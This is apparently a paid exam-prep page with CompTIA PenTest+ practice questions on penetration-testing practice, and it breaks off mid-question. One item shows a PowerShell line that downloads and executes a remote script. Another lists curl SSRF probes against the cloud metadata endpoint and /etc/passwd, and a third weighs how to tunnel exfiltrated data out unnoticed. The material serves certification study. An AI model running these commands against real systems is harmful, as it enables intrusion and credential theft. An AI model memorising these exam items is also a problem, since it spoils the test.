Winter Special Sale Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 713PS592

PT0-003 CompTIA PenTest+ Exam Questions and Answers

Questions 4

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Options:

A.

Articulation of cause

B.

Articulation of impact

C.

Articulation of escalation

D.

Articulation of alignment

Buy Now
Questions 5

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

Options:

A.

Apply UTF-8 to the data and send over a tunnel to TCP port 25.

B.

Apply Base64 to the data and send over a tunnel to TCP port 80.

C.

Apply 3DES to the data and send over a tunnel UDP port 53.

D.

Apply AES-256 to the data and send over a tunnel to TCP port 443.

Buy Now
Questions 6

Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

If ($1 -eq "administrator") {

echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1 ') | powershell -noprofile -}

Which of the following is the penetration tester most likely trying to do?

Options:

A.

Change the system's wallpaper based on the current user's preferences.

B.

Capture the administrator's password and transmit it to a remote server.

C.

Conditionally stage and execute a remote script.

D.

Log the internet browsing history for a systems administrator.

Buy Now
Questions 7

Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?

Options:

A.

Burp Suite

B.

masscan

C.

Nmap

D.

hping

Buy Now
Questions 8

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?

Options:

A.

curl ?param=http://169.254.169.254/latest/meta-data/

B.

curl '?param=http://127.0.0.1/etc/passwd '

C.

curl '?param=